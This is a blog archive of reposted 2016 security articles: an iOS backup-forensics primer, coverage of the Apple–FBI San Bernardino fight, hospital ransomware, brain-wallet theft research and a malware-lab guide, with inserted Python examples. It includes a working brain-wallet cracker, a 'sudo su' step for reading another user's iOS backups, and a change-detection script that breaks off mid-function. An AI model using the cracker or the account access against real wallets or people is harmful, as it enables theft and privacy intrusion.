Category Archives: Hacks

Apple iOS Forensic Primer

The operating system Apple ships on its mobile devices (the iPod touch, iPhone and iPad) is iOS. Apple licenses iOS to its users rather than selling it, and its license terms specifically state that Apple retains ownership of iOS. The US DOJ is arguing for a legal precedent that would hold Apple to that continued ownership interest. If it succeeds, the company can potentially be compelled to assist law enforcement in exploiting the software on a target phone (which runs iOS) in the execution of a search warrant.

While authorities wait for a decision on that legal argument, iOS forensics is necessary whenever an Apple device has been used in, or is found to be evidence of, a crime. Whatever the outcome of the DOJ's position that "a product's continued ownership interest in a product after it is sold obliges the company to act as an agent of the state", the administrator needs to be able to pull data off the device immediately during an investigation. Even if an administrator is only checking whether a user is violating (or has violated) company policy, there is a need to access the data on the device.

A great deal of data gets stored on iPhones; some people have more data on their phone than on their computer. If you browse the phone's storage with a phone-disk tool you will not see the full file system (without a jailbreak these tools expose only the media area, /var/mobile/Media), but the full file system bears a strong resemblance to Mac OS X. Mac OS X is built on a core called Darwin, and iOS, built on the same core, has the same basic directory structure.

The two share their file-system heritage as well; for example, the often-quoted limit of 65,535 allocation blocks per volume comes from the classic HFS volume format that the HFS+ file systems on both platforms evolved from. iOS is essentially Mac OS X tuned and tailored to run on smaller mobile devices with different processors.

As we examine the directories and their subdirectories, we see what is available as we dig into the device. The DCIM directory holds the 100APPLE directory, which is where the camera's photos are kept. There is also a Downloads directory (which holds downloads), an iTunes_Control directory (which holds synced music), and so on. The significance is that these directories expose the user data on a particular device.

Another place to look for system information is a terminal window on the computer the device syncs with. The command line lets an administrator examine the sync data that iTunes keeps for the device. If that data belongs to a different account from the one you are logged in as, sudo lets an administrator switch to that account without knowing its password. You type:

$ sudo su clyde (switch to the account the device syncs with; sudo lets an administrator do this without clyde's password)

$ cd (with no argument, change to that account's home directory)

$ pwd (print the working directory)

/Users/clyde (this is our current directory; on OS X home directories live under /Users)

The terminal window lets us examine the sync data with the privileges of the account that owns it, which gives us access to all of its files. Instead of looking at the phone itself with different tools, you can analyze the synced data through the command line.

$ cd Library/ (change into the account's Library directory)

$ cd "Application Support/" (change into the Application Support directory; the name contains a space, so quote it)

$ ls (list the contents of the directory, looking for the MobileSync directory)

MobileSync is where iTunes keeps the data for every device that has synced with this computer, so an administrator can examine it in relation to the device.

$ cd MobileSync (change into the MobileSync directory)

$ ls (list the contents of the directory)

Backup (this is the only entry)

$ cd Backup (change into the Backup directory)

$ ls (list the backups: one directory per device, named by the device's identifier, or UDID)

This is significant because, in addition to examining the device itself, I can list all of the backups and select one. A lot of data is stored in a backup. These files are simply the backup that iTunes stored on the hard drive when the connected device (whether an iPad or an iPhone) was backed up, so an administrator who can look at the phone's directories with a utility like PhoneDisk can also analyze the backup. If you don't have the phone but you do have the computer, the backup gives you almost as good a set of information as the phone itself, because it has to store everything needed to restore the phone.

If you have a user's computer and find the iPhone backups on it, you have the information that was stored on the phone. Utilities exist that parse these backups and extract their contents, giving an administrator the ability to examine all of the data captured in the backups.

When performing iOS forensics the phone's own data is not the only question, because sometimes an administrator cannot access it at all when the phone has a passcode. If you have access to the backup directory on the computer the phone syncs with, you may have a better chance of getting the data and doing the forensic analysis on the computer where the backups are stored. One caveat: if the user turned on the "Encrypt backup" option in iTunes, the backup is protected with a password the user chose, and that password is needed before any of its contents can be read (the keychain, for instance, is only backed up in full when encryption is on). Short of an encrypted backup, the sync computer is what defeats the passcode's ability to keep administrators and law enforcement from performing a forensic analysis.
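Listing the Backup directory by hand only tells you the device identifiers. To know which device each backup belongs to, how old it is and whether it can be read without a password, you need the Info.plist and Manifest.plist inside each backup directory. The script below is an added example, not code from the article: it walks a MobileSync Backup directory and summarizes every backup it finds. The plist key names (Device Name, Product Version, Last Backup Date, IsEncrypted) and the index-file names (Manifest.db for iOS 10 and later, Manifest.mbdb before that) are taken from real backups rather than from this page, and the sample store it builds when no real backups are present is constructed data.

```python
"""Inventory the iOS backups under a MobileSync Backup directory.

Added example, not code from the original article.  Assumes the layout
iTunes uses: one directory per device, named by the device UDID, holding an
Info.plist (device name, iOS version, backup date) and a Manifest.plist whose
IsEncrypted key records whether the user enabled "Encrypt backup".  The key
and file names are assumptions taken from real backups, not from the page.
"""
import os
import plistlib
import tempfile
from datetime import datetime

DEFAULT_ROOT = os.path.expanduser("~/Library/Application Support/MobileSync/Backup")


def _load_plist(path):
    """Return the plist at path as a dict, or {} if the file is missing."""
    if not os.path.isfile(path):
        return {}
    with open(path, "rb") as fh:
        return plistlib.load(fh)


def inventory_backups(root=DEFAULT_ROOT):
    """Describe every backup directory under root, newest first."""
    backups = []
    for udid in os.listdir(root):
        path = os.path.join(root, udid)
        if not os.path.isdir(path):
            continue
        info = _load_plist(os.path.join(path, "Info.plist"))
        manifest = _load_plist(os.path.join(path, "Manifest.plist"))
        # iOS 10 and later index the backup in a SQLite Manifest.db; older
        # backups used a flat Manifest.mbdb.  The file records themselves are
        # stored beside the index under hashed names, so we only count them.
        if os.path.isfile(os.path.join(path, "Manifest.db")):
            layout = "Manifest.db"
        elif os.path.isfile(os.path.join(path, "Manifest.mbdb")):
            layout = "Manifest.mbdb"
        else:
            layout = "unknown"
        file_count = sum(len(files) for _, _, files in os.walk(path))
        backups.append({
            "udid": udid,
            "device_name": info.get("Device Name"),
            "ios_version": info.get("Product Version"),
            "last_backup": info.get("Last Backup Date"),   # naive UTC datetime
            "encrypted": bool(manifest.get("IsEncrypted", False)),
            "layout": layout,
            "files": file_count,
        })
    backups.sort(key=lambda b: b["last_backup"] or datetime.min, reverse=True)
    return backups


def build_sample_store(root):
    """Write two constructed backups under root (fixture data, not real)."""
    samples = [
        ("0123456789abcdef0123456789abcdef01234567", "Clyde's iPhone", "10.2",
         datetime(2016, 2, 18, 9, 30), True, "Manifest.db"),
        ("fedcba9876543210fedcba9876543210fedcba98", "Clyde's iPad", "9.0",
         datetime(2015, 11, 2, 22, 5), False, "Manifest.mbdb"),
    ]
    for udid, name, version, when, encrypted, index in samples:
        path = os.path.join(root, udid)
        os.makedirs(path)
        with open(os.path.join(path, "Info.plist"), "wb") as fh:
            plistlib.dump({"Device Name": name, "Product Version": version,
                           "Last Backup Date": when, "Unique Identifier": udid.upper()}, fh)
        with open(os.path.join(path, "Manifest.plist"), "wb") as fh:
            plistlib.dump({"IsEncrypted": encrypted, "Version": "10.0"}, fh)
        with open(os.path.join(path, index), "wb") as fh:
            fh.write(b"")                       # stand-in for the real index
        for i in range(3):                      # three constructed record files
            with open(os.path.join(path, "%040x" % (i + 1)), "wb") as fh:
                fh.write(b"constructed record %d" % i)
    return root


def demo():
    """Run the inventory against a constructed store in a temp directory."""
    return inventory_backups(build_sample_store(tempfile.mkdtemp()))


def report(backups):
    """One line per backup, flagging the ones that need a backup password."""
    lines = []
    for b in backups:
        when = b["last_backup"].strftime("%Y-%m-%d %H:%M") if b["last_backup"] else "unknown"
        lines.append("%s  %-16s iOS %-6s %s  %s  %d files  %s" % (
            b["udid"], b["device_name"], b["ios_version"], when,
            "ENCRYPTED" if b["encrypted"] else "plain", b["files"], b["layout"]))
    return "\n".join(lines)


if __name__ == "__main__":
    found = inventory_backups() if os.path.isdir(DEFAULT_ROOT) else demo()
    print(report(found))
```

Run it on the Mac that syncs the device, as the account that owns the backups or after switching to it with sudo; when no Backup directory exists it reports the constructed sample store instead. An ENCRYPTED entry means the user's backup password must be recovered before any record in that backup can be parsed.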

Source: Apple iOS Forensic Primer, http://www.sooperarticles.com/technology-articles/mobile-computing-articles/apple-ios-forensic-primer-1453263.html#ixzz40dsmaebc

JOHN MCAFEE: I’ll decrypt the San Bernardino phone free of charge so Apple doesn’t need to place a back door on its product

Cybersecurity expert John McAfee is running for president in the US as a member of the Libertarian Party. This is an op-ed article he wrote and gave us permission to run.

Using an obscure law, written in 1789 — the All Writs Act — the US government has ordered Apple to place a back door into its iOS software so the FBI can decrypt information on an iPhone used by one of the San Bernardino shooters.

It has finally come to this. After years of arguments by virtually every industry specialist that back doors will be a bigger boon to hackers and to our nation’s enemies than publishing our nuclear codes and giving the keys to all of our military weapons to the Russians and the Chinese, our government has chosen, once again, not to listen to the minds that have created the glue that holds this world together.

This is a black day and the beginning of the end of the US as a world power. The government has ordered a disarmament of our already ancient cybersecurity and cyberdefense systems, and it is asking us to take a walk into that near horizon where cyberwar is unquestionably waiting, with nothing more than harsh words as a weapon and the hope that our enemies will take pity at our unarmed condition and treat us fairly.

Any student of world history will tell you that this is a dream. Would Hitler have stopped invading Poland if the Polish people had sweetly asked him not to do so? Those who think yes should stand strongly by Hillary Clinton’s side, whose cybersecurity platform includes negotiating with the Chinese so they will no longer launch cyberattacks against us.

The FBI, in a laughable and bizarre twist of logic, said the back door would be used only once and only in the San Bernardino case.

Tim Cook, CEO of Apple, replied:

The government suggests this tool could only be used once, on one phone. But that’s simply not true. Once created, the technique could be used over and over again, on any number of devices. In the physical world, it would be the equivalent of a master key, capable of opening hundreds of millions of locks — from restaurants and banks to stores and homes. No reasonable person would find that acceptable.

The government is asking Apple to hack our own users and undermine decades of security advancements that protect our customers — including tens of millions of American citizens — from sophisticated hackers and cybercriminals. The same engineers who built strong encryption into the iPhone to protect our users would, ironically, be ordered to weaken those protections and make our users less safe.


No matter how you slice this pie, if the government succeeds in getting this back door, it will eventually get a back door into all encryption, and our world, as we know it, is over. In spite of the FBI’s claim that it would protect the back door, we all know that’s impossible. There are bad apples everywhere, and there only needs to be one in the US government. Then a few million dollars, some beautiful women (or men), and a yacht trip to the Caribbean might be all it takes for our enemies to have full access to our secrets.

Cook said:

The FBI may use different words to describe this tool, but make no mistake: Building a version of iOS that bypasses security in this way would undeniably create a backdoor. And while the government may argue that its use would be limited to this case, there is no way to guarantee such control.

The fundamental question is this: Why can’t the FBI crack the encryption on its own? It has the full resources of the best the US government can provide.

With all due respect to Tim Cook and Apple, I work with a team of the best hackers on the planet. These hackers attend Defcon in Las Vegas, and they are legends in their local hacking groups, such as HackMiami. They are all prodigies, with talents that defy normal human comprehension. About 75% are social engineers. The remainder are hardcore coders. I would eat my shoe on the Neil Cavuto show if we could not break the encryption on the San Bernardino phone. This is a pure and simple fact.

And why do the best hackers on the planet not work for the FBI? Because the FBI will not hire anyone with a 24-inch purple mohawk, 10-gauge ear piercings, and a tattooed face who demands to smoke weed while working and won’t work for less than a half-million dollars a year. But you bet your ass that the Chinese and Russians are hiring similar people with similar demands and have been for many years. It’s why we are decades behind in the cyber race.


Cyberscience is not just something you can learn. It is an innate talent. The Juilliard School of Music cannot create a Mozart. A Mozart or a Bach, much like our modern hacking community, is genetically created. A room full of Stanford computer science graduates cannot compete with a true hacker without even a high-school education.

So here is my offer to the FBI. I will, free of charge, decrypt the information on the San Bernardino phone, with my team. We will primarily use social engineering, and it will take us three weeks. If you accept my offer, then you will not need to ask Apple to place a back door in its product, which will be the beginning of the end of America.

If you doubt my credentials, Google “cybersecurity legend” and see whose name is the only name that appears in the first 10 results out of more than a quarter of a million.

Edward Snowden defends Apple in fight against FBI

Edward Snowden — the ex-NSA contractor who started this whole privacy debate — has joined the ranks of Apple defenders.

On Tuesday, a federal magistrate-judge ruled that Apple must help the FBI break into the phone of one of the San Bernardino shooters. The FBI was unable to figure out the shooter’s passcode, which is the only way to get inside his iPhone.

Apple CEO Tim Cook is furious, saying that the U.S. government is trying to undermine the security of its flagship product.

“The government is asking Apple to hack our own users and undermine decades of security advancements that protect our customers,” Cook said.

Apple plans to fight the decision, aided by the ACLU.

On Wednesday, the divide was clear: politicians versus engineers.

“The FBI is creating a world where citizens rely on Apple to defend their rights, rather than the other way around,” Snowden said Wednesday morning on Twitter.

Late Wednesday, Silicon Valley’s powerful tech industry trade group came out in support of Apple too.

“We worry about the broader implications … of requiring technology companies to cooperate with governments to disable security features, or introduce security vulnerabilities,” said the Information Technology Industry Council, which represents Dell, Facebook, Google, Hewlett Packard, IBM, Microsoft, Nokia and others.

For years, the FBI has demanded special access into smartphones. Tech companies have refused, instead increasing the security of their customers’ data.

Cryptographers, the scholars who build security into technology, have unanimously warned that special access is a dangerous idea. To them, this isn’t about security competing with privacy. It’s just about security.

The San Bernardino shooter, Syed Farook, used an iPhone 5C. The FBI has been trying to guess his passcode to unlock it. Because the phone may have the optional Erase Data setting enabled, ten wrong guesses could permanently erase all the data stored inside.

Apple doesn’t hold the keys to his device. But the FBI wants Apple to create a special version of its iOS software that will get loaded onto the phone, circumvent Apple’s security features and let agents hack it.

Dan Guido, who runs the cybersecurity firm Trail of Bits, explained in a blog post Wednesday that this hack is possible. He said it would work on any iPhone 5C or older model, putting them “at risk when they’re confiscated by law enforcement around the world.”

Last year, the world’s top cryptographers issued a joint paper (“Keys Under Doormats”) saying this is a bad idea. CNNMoney asked them if this particular San Bernardino case changes their mind. All seven who responded said no.

Matthew Green, who teaches cryptography and computer security at Johns Hopkins University, fears it’s a slippery slope. If Apple complies with the government this time, it’ll be forced to in the future.

“I haven’t seen any guiding principle that would prevent this from getting out of hand. It could easily result in every American becoming less secure,” he said.

Columbia University computer science professor Steven M. Bellovin said that if Apple doesn’t resist the FBI, it’ll soon face the same pressure from authoritarian and repressive governments like China.

“This makes it much easier for others — other police departments, other governments — to demand the same thing,” he said.

Bruce Schneier, one of the world’s top cryptographers, warned that criminals could also use this kind of special access to break into people’s phones to steal messages, photographs and other personal information. If Apple creates a weaker version of its operating system, others will get their hands on it.

Most tech industry executives — who normally tout privacy — remained silent Wednesday. WhatsApp cofounder Jan Koum stood out with this message on Facebook: “We must not allow this dangerous precedent to be set.”

U.S. Senator Ron Wyden of Oregon, one of the few politicians to rise to Apple’s defense, said “no company should be forced to deliberately weaken its products.”


Other politicians pushed back on that idea Wednesday. White House Press Secretary Josh Earnest told reporters that the FBI is “not asking Apple to redesign its product or create a new backdoor to one of their products. They’re simply asking for something that would have an impact on this one device.”

Leading Republican presidential candidate Donald Trump weighed in too, saying, “we have to open it up.” Marco Rubio, who is also vying for the Republican presidential nomination, said Apple should give up its fight and be “a good corporate citizen.”

But even those who support the FBI’s demands say it’s a point of no return. Cyrus Walker teaches at the government-funded Cyber Defense Analysis Center, where he trains federal agents and police how to hack smartphones in criminal cases.

“If Apple demonstrates the ability to get around its own security countermeasures, that bell is rung and can’t be un-rung,” said Walker.

Google CEO Sides With Apple And Tim Cook, Opposes FBI’s Demand For iPhone Backdoor

Google’s CEO Sundar Pichai has joined a number of other high-profile individuals in expressing his opinion on the FBI’s request that Apple provide backdoor access to an iPhone 5c that forms part of the San Bernardino shooting case. A federal judge has ruled that Apple must assist law enforcement in gaining access to a seized iPhone 5c that belonged to one of the shooters accused of killing 14 people in California. Commenting on the situation on social media, Pichai called it a “troubling precedent”.

If you weren’t privy to the whole situation, then it’s probably worth noting that Apple’s CEO Tim Cook almost instantly responded to the ruling with a public and open message to Apple’s customers. In addition to providing a little insight into the ruling and how it came about, Cook also took the opportunity to inform the customers that Apple would be contesting the ruling, claiming that the FBI essentially wants Apple’s engineers to create a new version of iOS that comes with the ability to circumvent very specific security features (read: backdoor access). Cook clearly doesn’t want to have to build in a backdoor to the iPhone or iPad.



Google’s CEO didn’t instantly get involved in the situation, but has since posted a series of tweets which show that he sides with Tim Cook and Apple as a whole. Most notably, Pichai’s five tweets on the predicament claimed Apple’s acceptance of the ruling, if that was indeed the company’s stance, “could compromise a user’s privacy”. He also stated publicly that acceptance of a ruling to provide access to data based on valid legal order is “wholly different than requiring companies to enable hacking of customer devices & data”. It’s difficult to disagree with those views.

Of course, not everyone weighing in with an opinion on the San Bernardino iPhone situation accepts Apple’s stance on the ruling. Republican candidate, and general worldwide laughing stock, Donald Trump predictably doesn’t agree with Tim Cook’s decision to resist the order, stating that he agrees “100 percent with the courts” and asking of Apple, “Who do they think they are?”.

We’re pretty sure that the public backing of a fellow CEO in the position of Pichai carries a whole lot more importance than the negativity of Mr. Trump.


FBI wants $38 million in new funding to break encryption

The funding bid will help the agency “develop and acquire tools” that break encryption.


The FBI is looking to spend an additional $38.3 million in the coming year to “counter the threat” of encryption.

That’s on top of $31 million already spent on the initiative, according to the agency’s fiscal 2017 budget request published earlier this week by the Justice Department.

The budget request will not be used to hire any new staffers on top of the 39 staffers (including 11 agents), but will be used to “develop and acquire tools for electronic device analysis, cryptanalytic capability, and forensic tools.”

In other words: the feds want access to your encrypted communications, and they’re willing to throw money at getting it.

According to the document, the additional funding will “counter the threat of Going Dark, which includes the inability to access data because of challenges related to encryption, mobility, anonymization, and more.”




The FBI refers to “going dark” as a metaphor for not being able to read the communications and messages of suspected criminals and terrorists.

The FBI did not immediately respond to a request for comment asking what exactly the combined $69.3 million on anti-encryption efforts would entail.

The FBI is known to buy exploits from private intelligence companies, like the Milan, Italy-based Hacking Team, which last year was hit by hackers who leaked documents detailing the company’s work and global government partners.

Encryption and other privacy tools are increasingly troublesome for the agency, as FBI director James Comey has repeatedly claimed over the past year.


The agency chief has been on a tear trying to convince lawmakers and technology giants alike that locking the agency out is making it harder to catch criminals, despite reports suggesting the complete opposite.

Comey’s anti-encryption rhetoric intensified after Apple extended device encryption in iOS 8 so that the data on a locked iPhone or iPad is protected by keys derived from the user’s passcode, a change thought to be a response to claims, in documents leaked by whistleblower Edward Snowden, that Apple was a participant in the notorious PRISM surveillance program. In doing so Apple put the keys in the hands of its users and cut even itself out of the loop, which riled the FBI, which had regularly asked the company for help unlocking criminals’ phones.

The bump in funding comes as the agency continues to realign its efforts to keep ahead of the technological curve.

The document also said the agency would spend an additional $85.1 million on its cyber offensive and defensive operation.

“The FBI will obtain updated and sophisticated IT hardware, IT software, and contractors to expand the foundation of its offensive and defensive operations,” the report said.

Hackers Are Holding an LA Hospital’s Computers Hostage


Ransomware attacks, in which hackers lock your computer or keyboard until you pay a ransom, are on the rise. The latest notable ransomware victim is Hollywood Presbyterian Medical Center in Los Angeles, whose computers have been offline for over a week. The computers will come back online, the hackers reportedly say, in exchange for $3.4 million, paid in bitcoin.

The Hack

The incident, first reported by a local NBC affiliate, affects the Los Angeles hospital’s computer systems, including those needed for lab work, pharmaceutical orders, and even the emergency room.

While the hospital’s spokesperson was unavailable to comment, HPMC president and CEO Allen Stefanek told KNBC that it was “clearly not a malicious attack; it was just a random attack.” It’s not clear what he means, though; a hospital in a wealthy neighborhood seems unlikely to be a random target, especially for such a large sum.

As WIRED explained last fall, while ransomware has been around for over a decade, hackers have been embracing increasingly sophisticated methods. In the past, ransomware could only lock a target’s keyboard and computer; now it encrypts the infected system’s files so that only a decryption key held by the attacker can restore them. That may be what has happened here, according to anonymous hospital sources who told NBC4 that the hackers offered a “key” in exchange for the ransom money. The hospital has yet to officially detail the attack.



Who’s Affected

Stefanek told NBC4 that patient care hasn’t suffered, although some 911 patients have been sent to other nearby hospitals. Meanwhile, it appears to mostly add up to a headache for those in the HPMC system because hospital staff have had to write all documentation out by hand for the last week. Some patients, meanwhile, need to drive to more remote hospitals for medical tests that HPMC cannot offer without a functioning network.

The fallout appears limited to this one hospital, though, and even within its walls the impact seems annoying, but not crippling. HPMC says it’s working with the FBI, LAPD, and computer forensics experts to recover its systems.

How Bad Is It?

Given the range of things that could go wrong at the intersection of hospitals and hackers, this isn’t so terrible. But in terms of the scale of the ransom, it’s about as bad as it gets. Symantec recently pegged the total amount of ransomware paid out in any given year at $5 million. This single incident asks for well over half that amount.

The bigger impact may not be clear until after the incident is resolved. If the hospital ends up paying out, it could inspire copycat attacks. If not, and the hackers are identified, it could act as a deterrent. Either way, for now it shows that no target is off limits for ransomware, nor is any sum.

Password cracking attacks on Bitcoin wallets net $103,000

Hackers have siphoned about $103,000 out of Bitcoin accounts that were protected with an alternative security measure, according to research that tracked six years’ worth of transactions. Account-holders used easy-to-remember passwords to protect their accounts instead of the long cryptographic keys normally required.

The heists were carried out against almost 900 accounts where the owners used passwords to generate the private encryption keys required to withdraw funds. In many cases, the vulnerable accounts were drained within minutes or seconds of going live. The electronic wallets were popularly known as “brain wallets” because, the thinking went, Bitcoin funds were stored in users’ minds through memorization of a password rather than a 64-character private key that had to be written on paper or stored digitally. For years, brain wallets were promoted as a safer and more user-friendly way to secure Bitcoins and other digital currencies, although Gregory Maxwell, Gavin Andresen, and many other Bitcoin experts had long warned that they were a bad idea.

The security concerns were finally proven once and for all last August when Ryan Castellucci, a researcher with security firm White Ops, presented research at the Defcon hacker convention that showed how easy it was to attack brain wallets at scale. Brain wallets used no cryptographic salt and passed the plaintext password through a single hash iteration (the SHA256 function) to produce the private key, a shortcoming that let an attacker test each candidate password against every brain wallet at once. Worse, the public key derived from that hash (and the address computed from it) is recorded in the Bitcoin blockchain, providing all the material needed to recognize a correct guess and compromise the account.

By contrast, Google, Facebook, and virtually all other security-conscious services protect passwords by storing them in cryptographic form that’s been passed through a hash function, typically tens of thousands of times or more, a process known as key stretching that greatly increases the time and resources required by crackers. The services also use cryptographic salt, a measure that requires each hash to be processed separately to prevent the kind of mass cracking Castellucci did. Security-conscious services also go to great lengths to keep password hashes confidential, a secrecy that’s not possible with Bitcoin because of the transparency provided by the blockchain.

Brain drain

According to a recently published research paper, the brain wallet vulnerability was known widely enough to have been regularly exploited by real attackers going after real accounts. Over a six-year span that ended last August, attackers used the cracking technique to drain 884 brain wallet accounts of 1,806 bitcoins. Based on the value of each coin at the time the theft took place, the value of the purloined coins was $103,000.

“Our results reveal the existence of an active attacker community that rapidly steals funds from vulnerable brain wallets in nearly all cases we identify,” the paper authors wrote. “In total, approximately $100K worth of bitcoin has been loaded into brain wallets, with the ten most valuable wallets accounting for over three-quarters of the total value. Many brain wallets are drained within minutes, and while those storing larger values are emptied faster, nearly all wallets are drained within 24 hours.”

The paper, titled “The Bitcoin Brain Drain: A Short Paper on the Use and Abuse of Bitcoin Brain Wallets,” is scheduled to be presented later this month at the Financial Cryptography and Data Security 2016 conference. Its publication comes about six months after Brainwallet.org, the most widely used Bitcoin-based brain wallet service, permanently ceased operations. The service voluntarily shut down following the Defcon presentation by Castellucci, who is one of the authors of the most recent paper.

To identify brain wallets and then crack them, the research team compiled 300 billion password candidates taken from more than 20 lists, including the Urban Dictionary, the English language Wikipedia, the seminal plaintext password leak from the RockYou gaming website, and other large online compromises. By collecting words and entire phrases from a wide body of sources, the researchers employed a technique Ars covered in 2013 that allowed them to crack words and phrases many people would have considered to be strong passwords. Cracked passphrases included “say hello to my little friend,” “yohohoandabottleofrum,” and “dudewheresmycar.”

The researchers ran each password candidate through the SHA256 function to derive a candidate private key of the kind brain wallets used. They then used elliptic-curve scalar multiplication to find the public key corresponding to each candidate private key. Since the Bitcoin blockchain records the address (a hash of the public key) of every funded output, and the public key itself once the funds are spent, it was easy to know when a password guess matched a real Bitcoin user.
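To make the derivation concrete, here is an added example (not the researchers’ or brainwallet.org’s code) that carries out the attack described in the last few paragraphs end to end: it hashes each candidate phrase with a single unsalted SHA-256 to get a private key, multiplies the secp256k1 generator by it to get the public key, and checks the result against a set of observed public keys. The curve constants are the standard secp256k1 parameters; the target set and the word list are constructed for the demonstration, not taken from the blockchain.

```python
"""Brain-wallet cracking as the article describes it.

Added example, not the researchers' code.  A brain wallet takes
SHA-256(passphrase), unsalted and unstretched, as the secp256k1 private key,
and the matching public key (or the address hashed from it) ends up on the
blockchain.  One pass over a candidate list therefore yields public keys that
can be matched against every observed key at once.  The curve arithmetic is
textbook affine double-and-add, far too slow for billions of candidates;
real crackers use optimised libraries and precomputed tables.
"""
import hashlib

# secp256k1 domain parameters (standard values)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def _point_add(p1, p2):
    """Add two affine points on y^2 = x^3 + 7; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None                                   # Q + (-Q) = infinity
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P        # tangent slope, a = 0
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point=G):
    """Double-and-add: k * point."""
    result, addend = None, point
    while k:
        if k & 1:
            result = _point_add(result, addend)
        addend = _point_add(addend, addend)
        k >>= 1
    return result


def brainwallet_privkey(passphrase):
    """The entire key derivation: one unsalted SHA-256 of the passphrase."""
    return int.from_bytes(hashlib.sha256(passphrase.encode("utf-8")).digest(), "big")


def brainwallet_pubkey(passphrase):
    """Uncompressed public key (04 || x || y) as brainwallet.org produced it,
    or None for the astronomically rare hash outside [1, N-1]."""
    k = brainwallet_privkey(passphrase)
    if not 1 <= k < N:
        return None
    x, y = scalar_mult(k)
    return "04%064x%064x" % (x, y)


def crack(candidates, observed_pubkeys):
    """One derivation per candidate, checked against every observed key."""
    hits = {}
    for phrase in candidates:
        pub = brainwallet_pubkey(phrase)
        if pub in observed_pubkeys:
            hits[pub] = phrase
    return hits


if __name__ == "__main__":
    # Constructed targets: keys a victim would have funded from these phrases.
    targets = {brainwallet_pubkey(p) for p in ("correct horse battery staple", "dudewheresmycar")}
    wordlist = ["password", "letmein", "say hello to my little friend", "dudewheresmycar",
                "correct horse battery staple", "yohohoandabottleofrum"]
    for pub, phrase in crack(wordlist, targets).items():
        print("%s... <- %r" % (pub[:18], phrase))
```

Two things the code makes visible. First, the cost per candidate is the same whether there is one target or a million, because nothing per-account enters the derivation; a salted, stretched scheme like the one the paragraph above credits to Google and Facebook would force a separate stretched computation for every account. Second, this plain-Python arithmetic manages on the order of a hundred keys per second; the 300 billion candidates in the paper call for optimised curve libraries and precomputed tables, which is how attackers were able to drain wallets within seconds.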

The paper reported that vulnerable accounts were often drained within minutes of going live, and in an interview, Castellucci said that some accounts were liquidated in seconds. Castellucci said he suspects the speed was the result of attackers who used large precomputed tables containing millions or billions of potential passwords. While many of the attackers who drained vulnerable accounts earned paltry sums for their work, the top four drainers netted about a total of $35,000 among them. Meanwhile, the drainer who emptied the most brain wallets—about 100 in all—made $3,219.

The thefts were often chronicled in online forums, where participants would report that their Bitcoin wallets had mysteriously been emptied. For a while, people assuming the role of a digital Robin Hood claimed to crack vulnerable wallets, drain them of their contents, and then wait for the victim to publicly complain of the theft on Reddit or various bitcoin forums. The Robin Hood and Little John hackers would then claim to return the funds once the victim proved control of the compromised private key.

While plenty of people publicly warned of risks of brain wallets over the years, the vulnerability was often dismissed as theoretical by some. Brain wallets are now generally shunned by Bitcoin users, but Castellucci warned that an alternative crypto currency known as Ethereum can use a brain wallet scheme that’s every bit as weak as the Bitcoin one was. He is withholding details for now in the hopes that Ethereum brain wallets will soon be abandoned.

Laboratory and Online Malware Analysis

Your network has been compromised by a virus, worm, Trojan, botnet client or some other form of malware. As the systems or network administrator, you know malware analysis is necessary because your system (or network) has been exposed. The goal is to figure out what the malware has done so you can determine the destruction or damage it caused, identify the threat or vulnerability your company has been exposed to, and determine whether there is a risk that information is leaving your enterprise.

Depending on the nature of your business (cybersecurity exists to facilitate the conduct of business), the Administrator investigates to determine whether individual users (or consumers) could be harmed through the loss of credit card or personal information. The Administrator must also check whether the company has been damaged through the loss of intellectual property taken by the Malware. An initial assessment of the loss or damage is made. Although Malware attacks have permeated every platform, Windows remains the most popular platform to attack among Malware authors.

The Security minded Administrator will have a Virtual or traditional controlled (isolated) laboratory set up to examine Malware specimens. The Virtual lab allows the Administrator to run multiple clients or servers (and multiple operating systems) on a single computer system to examine how Malware specimens interact with other computer systems within a network. The Virtual lab also allows you to record the state of a system or network (before the Malware is introduced) by taking snapshots. This also allows the Administrator to return a system or network to its original state after the analysis is complete.

Networking in the Virtual environment allows the Administrator to observe the Malware exhibit its full potential in a controlled environment as the malicious program reveals its network interactions. When you build this laboratory setup, you must use a large hard drive on the physical system (the virtual machines’ files live there) and install as much RAM into the physical system as you can, since memory is an important performance factor for virtualization tools. Use an inexpensive hub or switch where applicable.

The professional Malware writer has begun producing Malware that can detect whether it is being run in a virtualized environment. This makes it practical to also have physical machines available as laboratory systems. The isolated test lab is a necessity for proper analysis and for developing the skills critical to an Administrator and an Incident Response (IR) team responding to security incidents. The free tools that will aid the Administrator’s analysis in the lab are:

  1. Network monitoring: Wireshark – We can use this network sniffer to observe lab traffic for malicious communications.
  2. Process monitoring: Process Explorer (and Process Hacker) – We can replace Windows Task Manager with these and observe malicious processes.
  3. Change detection: Regshot – We can compare the system’s state (Registry and file system) before and after the infection.
  4. File system and registry monitoring: Process Monitor (with ProcDOT) – We can observe how local processes read, write, or delete registry entries and files. These tools help you understand how malware attempts to embed itself in the system upon infection.
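As an added example (not code from the article or from any of the tools listed above), here is a minimal Regshot-style change detector for a file tree in Python: it snapshots a directory before and after a specimen runs and diffs the two snapshots to list added, removed and modified files. The sample tree, the dropped file name and the hosts entry are constructed for the demonstration and do not describe any real specimen.

```python
import hashlib
import os
import shutil
import tempfile


def snapshot(root):
    """Map each file under root (relative path) to its size and SHA-256."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            state[os.path.relpath(full, root)] = (os.path.getsize(full), digest)
    return state


def diff_snapshots(before, after):
    """Return sorted lists of paths added, removed or modified between two shots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before if p in after and before[p] != after[p]),
    }


def write(root, *parts, data="", mode="w"):
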